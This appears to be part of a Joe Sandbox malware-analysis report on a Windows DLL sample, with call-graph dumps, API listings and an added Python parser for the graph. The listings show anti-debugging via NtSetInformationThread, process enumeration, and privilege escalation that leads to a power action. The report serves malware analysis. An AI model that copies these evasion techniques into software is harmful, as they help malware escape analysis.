101053->101051 101056 6c2baa43 __wsopen_s std::locale::_Setgloballocale 101055->101056 101057 6c2bb3e9 WriteFile 101056->101057 101058 6c2bb43d WriteFile 101056->101058 101059 6c2bb718 101056->101059 101060 6c2bab95 ReadFile 101056->101060 101057->101056 101058->101056 101059->101051 101060->101056 101061->101035 101062->101033 
101063->101035 101064->101035 101065->101035 101066 6c2fcad3 101067 6c2fcafd 101066->101067 101068 6c2fcae5 __dosmaperr 101066->101068 101067->101068 101069 6c2fcb77 101067->101069 101071 6c2fcb48 __dosmaperr 101067->101071 101072 6c2fcb90 101069->101072 101074 6c2fcbe7 __wsopen_s 101069->101074 101075 6c2fcbab __dosmaperr 101069->101075 101108 6c2f0120 18 API calls __cftoe 101071->101108 101073 6c2fcb95 101072->101073 101072->101075 101076 6c3019e5 __wsopen_s 18 API calls 101073->101076 101102 6c2f47bb HeapFree GetLastError __dosmaperr 101074->101102 101101 6c2f0120 18 API calls __cftoe 101075->101101 101078 6c2fcd3e 101076->101078 101081 6c2fcdb4 101078->101081 101084 6c2fcd57 GetConsoleMode 101078->101084 101079 6c2fcc07 101103 6c2f47bb HeapFree GetLastError __dosmaperr 101079->101103 101083 6c2fcdb8 ReadFile 101081->101083 101086 6c2fce2c GetLastError 101083->101086 101087 6c2fcdd2 101083->101087 101084->101081 101088 6c2fcd68 101084->101088 101085 6c2fcc0e 101098 6c2fcbc2 __dosmaperr __wsopen_s 101085->101098 101104 6c2fac69 20 API calls __wsopen_s 101085->101104 101086->101098 101087->101086 101089 6c2fcda9 101087->101089 101088->101083 101090 6c2fcd6e ReadConsoleW 101088->101090 101094 6c2fce0e 101089->101094 101095 6c2fcdf7 101089->101095 101089->101098 101090->101089 101091 6c2fcd8a GetLastError 101090->101091 101091->101098 101097 6c2fce25 101094->101097 101094->101098 101106 6c2fcefe 23 API calls 3 library calls 101095->101106 101107 6c2fd1b6 21 API calls __wsopen_s 101097->101107 101105 6c2f47bb HeapFree GetLastError __dosmaperr 101098->101105 101100 6c2fce2a 101100->101098 101101->101098 101102->101079 101103->101085 101104->101073 101105->101068 101106->101098 101107->101100 101108->101068
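The call graph in this section is delivered as a flattened node and edge list (tokens such as `100853->100855` and `100854 6c163e8a GetCurrentThread NtSetInformationThread`), which is the plugin's rendering data rather than something meant to be read by eye. The Python script below is an added example, not part of the Joe Sandbox report or its tooling: it parses that token stream into nodes, addresses, labels and edges, then answers the question an analyst actually has, namely which Windows APIs are reachable from a given node. The token grammar (`<id>-><id>` for an edge, `<id> <8-hex-digit address>` for a node, following tokens as that node's labels) and the CamelCase heuristic that separates API names from runtime symbols such as `std::_Facet_Register` or `_strlen` are assumptions read off the dump above, not a documented format. The embedded sample is an excerpt copied from that dump: the NtSetInformationThread node at 6c163e8a and the AdjustTokenPrivileges/NtInitiatePowerAction node at 6c2e5d60, with their edges.

```python
"""Parse a flattened Joe Sandbox / IDA call-graph dump and report which
Windows APIs are reachable from a given node.

Token grammar assumed from the dump (an assumption, not a documented format):
  <id>-><id>          edge between two node ids
  <id> <hexaddress>   node definition (decimal id, 8 lowercase hex digits)
  other tokens        labels of the most recently defined node, e.g. API
                      names, runtime symbols, or counts like "4 API calls"
"""
import re
from dataclasses import dataclass, field

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
NODE_ID_RE = re.compile(r"^\d{1,7}$")       # decimal node ids (6 digits in this dump)
ADDRESS_RE = re.compile(r"^[0-9a-f]{8}$")   # 32-bit code address
# Heuristic for a Win32/Nt API name: CamelCase, leading capital, at least one
# lowercase letter. Rejects "API", "__cftoe", "std::_Facet_Register", "_strlen"
# and bare numbers, which also appear as node labels.
API_RE = re.compile(r"^[A-Z][A-Za-z0-9]*[a-z][A-Za-z0-9]*$")

# Excerpt copied from the call-graph dump above: the thread-hiding node at
# 6c163e8a and the privilege/power-action node at 6c2e5d60 with their edges.
SAMPLE = """
100853 6c163d62 100855 6c163bc0 100853->100855
100854 6c163e8a GetCurrentThread NtSetInformationThread
100856 6c163eea 100854->100856 100855->100854
100897 6c2d0390 11 API calls 100894->100897
100899 6c17244d 100897->100899
101047 6c2e5d60 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction
100899->101047 100901 6c172452 Sleep 100901->100866 101047->100901
"""


@dataclass
class CallGraph:
    address: dict = field(default_factory=dict)   # node id -> hex address
    labels: dict = field(default_factory=dict)    # node id -> [label, ...]
    succ: dict = field(default_factory=dict)      # node id -> {successor ids}

    def apis_at(self, node):
        """API names labelled on one node (empty for plain code nodes)."""
        return [t for t in self.labels.get(node, []) if API_RE.match(t)]


def parse_call_graph(text):
    tokens = text.split()
    g = CallGraph()
    current = None
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        edge = EDGE_RE.match(tok)
        if edge:
            g.succ.setdefault(edge.group(1), set()).add(edge.group(2))
            current = None                 # labels never follow an edge
            i += 1
            continue
        nxt = tokens[i + 1] if i + 1 < len(tokens) else ""
        if NODE_ID_RE.match(tok) and ADDRESS_RE.match(nxt):
            current = tok                  # "<id> <address>" opens a node
            g.address[tok] = nxt
            i += 2
            continue
        if current is not None:            # anything else labels the open node
            g.labels.setdefault(current, []).append(tok)
        i += 1
    return g


def reachable(g, start):
    """Node ids reachable from start along call-graph edges (start included)."""
    seen, stack = set(), [start]
    while stack:
        node = stack.pop()
        if node in seen:
            continue
        seen.add(node)
        stack.extend(g.succ.get(node, ()))
    return seen


def apis_reachable(g, start):
    """Sorted, de-duplicated API names on every node reachable from start."""
    apis = set()
    for node in reachable(g, start):
        apis.update(g.apis_at(node))
    return sorted(apis)


def api_sites(g):
    """node id -> (address, [apis]) for every node that names at least one API."""
    return {n: (g.address.get(n), g.apis_at(n)) for n in g.labels if g.apis_at(n)}


if __name__ == "__main__":
    graph = parse_call_graph(SAMPLE)
    for node, (addr, apis) in sorted(api_sites(graph).items(), key=lambda kv: kv[1][0]):
        print(f"{addr}: {' '.join(apis)}")
    # Walk from the routine at 6c163d62 and from the caller of the power-action helper.
    print("from 6c163d62:", apis_reachable(graph, "100853"))
    print("from 100894:", apis_reachable(graph, "100894"))
```

Run against the full dump, `apis_reachable` from the node of an exported or suspicious routine gives the same "N API calls" rollup the plugin prints, but spelled out, so the path from 6c163d62 to NtSetInformationThread or from a caller into the AdjustTokenPrivileges/NtInitiatePowerAction helper at 6c2e5d60 can be confirmed without clicking through the graph. The parser is deliberately limited to this function-level format; the basic-block control-flow graphs further down use address ranges (`6c2e5240-6c2e5275`) and `call` tokens and would need a separate tokenizer.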
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                              • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: _strlen
                              • String ID: HR^
                              • API String ID: 4218353326-1341859651
                              • Opcode ID: 173d1621d3a529ee3fd72907d50436c77e9c2824876f4f7862986c09601f00e4
                              • Instruction ID: 276c7904c53dd7d1f94ee149c9728156fd2e2fc461037ed114a27a68336d1027
                              • Opcode Fuzzy Hash: 173d1621d3a529ee3fd72907d50436c77e9c2824876f4f7862986c09601f00e4
                              • Instruction Fuzzy Hash: B2742531644B018FC728CF29C8D0695B7F3EF95318B298A6DC0A68BF55E778B54ACB50
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                              • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID: }jk$;T55$L@^
                              • API String ID: 0-4218709813
                              • Opcode ID: 9ee955a3ca4bef18ded641fb3a1fede5f89b200df50af5aa4219005830661620
                              • Instruction ID: 8407d2c76bda53a126ef799e007166fb094e208b94e3291ebf83de22b7031fa5
                              • Opcode Fuzzy Hash: 9ee955a3ca4bef18ded641fb3a1fede5f89b200df50af5aa4219005830661620
                              • Instruction Fuzzy Hash: D13429716447018FC738CF28C8D0A95B7F3EF95318B198A6DC0968BB55EB78B54ACB60

                               Control-flow Graph (legend: Executed / Not Executed)
                               control_flow_graph 7677 6c2e5240-6c2e5275 CreateToolhelp32Snapshot 7678 6c2e52a0-6c2e52a9 7677->7678 7679 6c2e52ab-6c2e52b0 7678->7679 7680 6c2e52e0-6c2e52e5 7678->7680 7681 6c2e5315-6c2e531a 7679->7681 7682 6c2e52b2-6c2e52b7 7679->7682 7683 6c2e52eb-6c2e52f0 7680->7683 7684 6c2e5377-6c2e53a1 call 6c2f2c05 7680->7684 7687 6c2e53a6-6c2e53ab 7681->7687 7688 6c2e5320-6c2e5332 Process32NextW 7681->7688 7690 6c2e52b9-6c2e52be 7682->7690 7691 6c2e5334-6c2e535d call 6c2eb920 Process32FirstW 7682->7691 7685 6c2e5277-6c2e5292 CloseHandle 7683->7685 7686 6c2e52f2-6c2e52f7 7683->7686 7684->7678 7685->7678 7686->7678 7692 6c2e52f9-6c2e5313 7686->7692 7687->7678 7697 6c2e53b1-6c2e53bf 7687->7697 7694 6c2e5362-6c2e5372 7688->7694 7690->7678 7696 6c2e52c0-6c2e52d1 7690->7696 7691->7694 7692->7678 7694->7678 7696->7678
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 6C2E524E
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                               • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: CreateSnapshotToolhelp32
                              • String ID:
                              • API String ID: 3332741929-0
                              • Opcode ID: ac27f304e8d3a19babdfdb584e630affaf8ea685832ca8f15bb888328dc2bd5d
                              • Instruction ID: d33c0d63d368c23ed82aaf45b713a7331043345a0c9d07bb537887317f7dd62c
                              • Opcode Fuzzy Hash: ac27f304e8d3a19babdfdb584e630affaf8ea685832ca8f15bb888328dc2bd5d
                              • Instruction Fuzzy Hash: 2A314F746183059FDB109F68C888B0ABBF4AF99745F90493EF898EB361D37198488F52

                               Control-flow Graph (legend: Executed / Not Executed)
                               control_flow_graph 7821 6c163886-6c16388e 7822 6c163894-6c163896 7821->7822 7823 6c163970-6c16397d 7821->7823 7822->7823 7826 6c16389c-6c1638b9 7822->7826 7824 6c1639f1-6c1639f8 7823->7824 7825 6c16397f-6c163989 7823->7825 7828 6c163ab5-6c163aba 7824->7828 7829 6c1639fe-6c163a03 7824->7829 7825->7826 7827 6c16398f-6c163994 7825->7827 7830 6c1638c0-6c1638c1 7826->7830 7831 6c163b16-6c163b18 7827->7831 7832 6c16399a-6c16399f 7827->7832 7828->7826 7836 6c163ac0-6c163ac7 7828->7836 7833 6c1638d2-6c1638d4 7829->7833 7834 6c163a09-6c163a2f 7829->7834 7835 6c16395e 7830->7835 7831->7830 7837 6c1639a5-6c1639bf 7832->7837 7838 6c16383b-6c163855 call 6c2b1470 call 6c2b1480 7832->7838 7841 6c163957-6c16395c 7833->7841 7839 6c163a35-6c163a3a 7834->7839 7840 6c1638f8-6c163955 7834->7840 7842 6c163960-6c163964 7835->7842 7836->7830 7843 6c163acd-6c163ad6 7836->7843 7845 6c163a5a-6c163a5d 7837->7845 7849 6c163860-6c163885 7838->7849 7846 6c163a40-6c163a57 7839->7846 7847 6c163b1d-6c163b22 7839->7847 7840->7841 7841->7835 7842->7849 7850 6c16396a 7842->7850 7843->7831 7844 6c163ad8-6c163aeb 7843->7844 7844->7840 7852 6c163af1-6c163af8 7844->7852 7856 6c163aa9-6c163ab0 7845->7856 7846->7845 7854 6c163b24-6c163b44 7847->7854 7855 6c163b49-6c163b50 7847->7855 7849->7821 7851 6c163ba1-6c163bb6 7850->7851 7864 6c163bc0-6c163bda call 6c2b1470 call 6c2b1480 7851->7864 7859 6c163b62-6c163b85 7852->7859 7860 6c163afa-6c163aff 7852->7860 7854->7856 7855->7830 7863 6c163b56-6c163b5d 7855->7863 7856->7842 7859->7840 7867 6c163b8b 7859->7867 7860->7841 7863->7842 7872 6c163be0-6c163bfe 7864->7872 7867->7851 7875 6c163c04-6c163c11 7872->7875 7876 6c163e7b 7872->7876 7877 6c163c17-6c163c20 7875->7877 7878 6c163ce0-6c163cea 7875->7878 7879 6c163e81-6c163ee0 call 6c163750 GetCurrentThread NtSetInformationThread 7876->7879 7880 6c163c26-6c163c2d 7877->7880 7881 6c163dc5 7877->7881 7882 6c163cec-6c163d0c 7878->7882 7883 6c163d3a-6c163d3c 7878->7883 7892 6c163eea-6c163f04 call 6c2b1470 call 6c2b1480 7879->7892 7886 6c163dc3 7880->7886 7887 6c163c33-6c163c3a 7880->7887 7888 6c163dc6 7881->7888 7889 6c163d90-6c163d95 7882->7889 7890 6c163d70-6c163d8d 7883->7890 7891 6c163d3e-6c163d45 7883->7891 7886->7881 7895 6c163e26-6c163e2b 7887->7895 7896 6c163c40-6c163c5b 7887->7896 7897 6c163dc8-6c163dcc 7888->7897 7893 6c163d97-6c163db8 7889->7893 7894 6c163dba-6c163dc1 7889->7894 7890->7889 7898 6c163d50-6c163d57 7891->7898 7915 6c163f75-6c163fa1 7892->7915 7893->7881 7894->7886 7900 6c163dd7-6c163ddc 7894->7900 7901 6c163e31 7895->7901 7902 6c163c7b-6c163cd0 7895->7902 7903 6c163e1b-6c163e24 7896->7903 7897->7872 7904 6c163dd2 7897->7904 7898->7888 7906 6c163e36-6c163e3d 7900->7906 7907 6c163dde-6c163e17 7900->7907 7901->7864 7902->7898 7903->7897 7908 6c163e76-6c163e79 7903->7908 7904->7908 7911 6c163e3f-6c163e5a 7906->7911 7912 6c163e5c-6c163e5f 7906->7912 7907->7903 7908->7879 7911->7903 7912->7902 7914 6c163e65-6c163e69 7912->7914 7914->7897 7914->7908 7919 6c163fa3-6c163fa8 7915->7919 7920 6c164020-6c164026 7915->7920 7923 6c163fae-6c163fcf 7919->7923 7924 6c16407c-6c164081 7919->7924 7921 6c163f06-6c163f35 7920->7921 7922 6c16402c-6c16403c 7920->7922 7925 6c163f38-6c163f61 7921->7925 7926 6c1640b3-6c1640b8 7922->7926 7927 6c16403e-6c164058 7922->7927 7929 6c1640aa-6c1640ae 7923->7929 7928 6c164083-6c16408a 7924->7928 7924->7929 7930 6c163f64-6c163f67 7925->7930 7926->7923 7933 6c1640be-6c1640c9 7926->7933 7931 6c16405a-6c164063 7927->7931 7928->7925 7932 6c164090 7928->7932 7934 6c163f6b-6c163f6f 7929->7934 7935 6c163f69 7930->7935 7936 6c1640f5-6c16413f 7931->7936 7937 6c164069-6c16406c 7931->7937 7932->7892 7938 6c1640a7 7932->7938 7933->7929 7939 6c1640cb-6c1640d4 7933->7939 7934->7915 7935->7934 7936->7935 7941 6c164144-6c16414b 7937->7941 7942 6c164072-6c164077 7937->7942 7938->7929 7939->7938 7943 6c1640d6-6c1640f0 7939->7943 7941->7934 7942->7930 7943->7931
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                               • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1f46f5a4823f4ee6f4bde57568a6acae08e61e6a565a2a422c0a8735088ded2e
                              • Instruction ID: 8fc52c1b4464eb4926c0550d92a0eedee013df940c5a5e032893c9e9251f8114
                              • Opcode Fuzzy Hash: 1f46f5a4823f4ee6f4bde57568a6acae08e61e6a565a2a422c0a8735088ded2e
                              • Instruction Fuzzy Hash: F232F232245B018FC324CF29C890695B7E3EF91314BAA8A6CC0EA4BF95D775B45BCB50

                               Control-flow Graph (legend: Executed / Not Executed)
                               control_flow_graph 7969 6c163a6a-6c163a85 7970 6c163a87-6c163aa7 7969->7970 7971 6c163aa9-6c163ab0 7970->7971 7972 6c163960-6c163964 7971->7972 7973 6c163860-6c16388e 7972->7973 7974 6c16396a 7972->7974 7983 6c163894-6c163896 7973->7983 7984 6c163970-6c16397d 7973->7984 7975 6c163ba1-6c163bb6 7974->7975 7978 6c163bc0-6c163bda call 6c2b1470 call 6c2b1480 7975->7978 7990 6c163be0-6c163bfe 7978->7990 7983->7984 7989 6c16389c-6c1638b9 7983->7989 7987 6c1639f1-6c1639f8 7984->7987 7988 6c16397f-6c163989 7984->7988 7992 6c163ab5-6c163aba 7987->7992 7993 6c1639fe-6c163a03 7987->7993 7988->7989 7991 6c16398f-6c163994 7988->7991 7994 6c1638c0-6c1638c1 7989->7994 8010 6c163c04-6c163c11 7990->8010 8011 6c163e7b 7990->8011 7996 6c163b16-6c163b18 7991->7996 7997 6c16399a-6c16399f 7991->7997 7992->7989 8001 6c163ac0-6c163ac7 7992->8001 7998 6c1638d2-6c1638d4 7993->7998 7999 6c163a09-6c163a2f 7993->7999 8000 6c16395e 7994->8000 7996->7994 8003 6c1639a5-6c1639bf 7997->8003 8004 6c16383b-6c163855 call 6c2b1470 call 6c2b1480 7997->8004 8007 6c163957-6c16395c 7998->8007 8005 6c163a35-6c163a3a 7999->8005 8006 6c1638f8-6c163955 7999->8006 8000->7972 8001->7994 8008 6c163acd-6c163ad6 8001->8008 8012 6c163a5a-6c163a5d 8003->8012 8004->7973 8013 6c163a40-6c163a57 8005->8013 8014 6c163b1d-6c163b22 8005->8014 8006->8007 8007->8000 8008->7996 8009 6c163ad8-6c163aeb 8008->8009 8009->8006 8016 6c163af1-6c163af8 8009->8016 8017 6c163c17-6c163c20 8010->8017 8018 6c163ce0-6c163cea 8010->8018 8021 6c163e81-6c163ee0 call 6c163750 GetCurrentThread NtSetInformationThread 8011->8021 8012->7971 8013->8012 8019 6c163b24-6c163b44 8014->8019 8020 6c163b49-6c163b50 8014->8020 8024 6c163b62-6c163b85 8016->8024 8025 6c163afa-6c163aff 8016->8025 8026 6c163c26-6c163c2d 8017->8026 8027 6c163dc5 8017->8027 8029 6c163cec-6c163d0c 8018->8029 8030 6c163d3a-6c163d3c 8018->8030 8019->7970 8020->7994 8028 6c163b56-6c163b5d 8020->8028 8041 6c163eea-6c163f04 call 6c2b1470 call 6c2b1480 8021->8041 8024->8006 8036 6c163b8b 8024->8036 8025->8007 8034 6c163dc3 8026->8034 8035 6c163c33-6c163c3a 8026->8035 8037 6c163dc6 8027->8037 8028->7972 8038 6c163d90-6c163d95 8029->8038 8039 6c163d70-6c163d8d 8030->8039 8040 6c163d3e-6c163d45 8030->8040 8034->8027 8044 6c163e26-6c163e2b 8035->8044 8045 6c163c40-6c163c5b 8035->8045 8036->7975 8046 6c163dc8-6c163dcc 8037->8046 8042 6c163d97-6c163db8 8038->8042 8043 6c163dba-6c163dc1 8038->8043 8039->8038 8047 6c163d50-6c163d57 8040->8047 8064 6c163f75-6c163fa1 8041->8064 8042->8027 8043->8034 8049 6c163dd7-6c163ddc 8043->8049 8050 6c163e31 8044->8050 8051 6c163c7b-6c163cd0 8044->8051 8052 6c163e1b-6c163e24 8045->8052 8046->7990 8053 6c163dd2 8046->8053 8047->8037 8055 6c163e36-6c163e3d 8049->8055 8056 6c163dde-6c163e17 8049->8056 8050->7978 8051->8047 8052->8046 8057 6c163e76-6c163e79 8052->8057 8053->8057 8060 6c163e3f-6c163e5a 8055->8060 8061 6c163e5c-6c163e5f 8055->8061 8056->8052 8057->8021 8060->8052 8061->8051 8063 6c163e65-6c163e69 8061->8063 8063->8046 8063->8057 8068 6c163fa3-6c163fa8 8064->8068 8069 6c164020-6c164026 8064->8069 8072 6c163fae-6c163fcf 8068->8072 8073 6c16407c-6c164081 8068->8073 8070 6c163f06-6c163f35 8069->8070 8071 6c16402c-6c16403c 8069->8071 8074 6c163f38-6c163f61 8070->8074 8075 6c1640b3-6c1640b8 8071->8075 8076 6c16403e-6c164058 8071->8076 8078 6c1640aa-6c1640ae 8072->8078 8077 6c164083-6c16408a 8073->8077 8073->8078 8079 6c163f64-6c163f67 8074->8079 8075->8072 8082 6c1640be-6c1640c9 8075->8082 8080 6c16405a-6c164063 8076->8080 8077->8074 8081 6c164090 8077->8081 8083 6c163f6b-6c163f6f 8078->8083 8084 6c163f69 8079->8084 8085 6c1640f5-6c16413f 8080->8085 8086 6c164069-6c16406c 8080->8086 8081->8041 8087 6c1640a7 8081->8087 8082->8078 8088 6c1640cb-6c1640d4 8082->8088 8083->8064 8084->8083 8085->8084 8090 6c164144-6c16414b 8086->8090 8091 6c164072-6c164077 8086->8091 8087->8078 8088->8087 8092 6c1640d6-6c1640f0 8088->8092 8090->8083 8091->8079 8092->8080
                              APIs
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                               • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: CurrentThread
                              • String ID:
                              • API String ID: 2882836952-0
                              • Opcode ID: 36c76e76e26ad5c867f5fcc259058b965bf7d0daa7fd903ee0c54d717b8365fc
                              • Instruction ID: 14cae92dcc8125e8c136fea94178c5817597de77339a26372d04d590570bd898
                              • Opcode Fuzzy Hash: 36c76e76e26ad5c867f5fcc259058b965bf7d0daa7fd903ee0c54d717b8365fc
                              • Instruction Fuzzy Hash: CB51F031104B018FC320CF2AC8907D5B7A3BF96314FAA8A5DC0E61BE95DB74B45ACB51
                              APIs
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                               • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: CurrentThread
                              • String ID:
                              • API String ID: 2882836952-0
                              • Opcode ID: 29f4ce15906b56d97adfa05cccf5abb06132bf78e0b55c7f4f150b563a207d28
                              • Instruction ID: b4b68e580aa89648624cb8dca2ffac800e93349c7e2f693df628db23f50fab2a
                              • Opcode Fuzzy Hash: 29f4ce15906b56d97adfa05cccf5abb06132bf78e0b55c7f4f150b563a207d28
                              • Instruction Fuzzy Hash: 9E51D131104B118BC320CF2AC490795B7B3BF96314FAA8A5DC0E65BE95DB74B45B8B91
                              APIs
                              • GetCurrentThread.KERNEL32 ref: 6C163E9D
                              • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6C163EAA
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                               • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: Thread$CurrentInformation
                              • String ID:
                              • API String ID: 1650627709-0
                              • Opcode ID: 24e25ae13e379f62bba38f4b63d2662c8131f67b23cacd1ce5a6f16412993943
                              • Instruction ID: 40069da50a7b2c0eaf7bcf5180326de8cb94f72ae656dca8357bb8c7698d09f5
                              • Opcode Fuzzy Hash: 24e25ae13e379f62bba38f4b63d2662c8131f67b23cacd1ce5a6f16412993943
                              • Instruction Fuzzy Hash: CB310331105B018BC320CF25C8947C6B7B3AF96314F5A8A5DC0A65BE81DB78701A9B51
                              APIs
                              • GetCurrentThread.KERNEL32 ref: 6C163E9D
                              • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6C163EAA
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                               • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: Thread$CurrentInformation
                              • String ID:
                              • API String ID: 1650627709-0
                              • Opcode ID: 5bd8740bf07f758a2b845615985871d7f6f1b421c412f2dcd05327660d0867c6
                              • Instruction ID: 049f25b3397fe5d34f26c7ea9c64d8f2752cfb8f327e7fd3a2ee23ca1f4f136e
                              • Opcode Fuzzy Hash: 5bd8740bf07f758a2b845615985871d7f6f1b421c412f2dcd05327660d0867c6
                              • Instruction Fuzzy Hash: B03123311047018BC324CF29C4A0796B7B7AF56308FAA4E5DC0E65BE81DB75B456CB92
                              APIs
                              • GetCurrentThread.KERNEL32 ref: 6C163E9D
                              • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6C163EAA
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
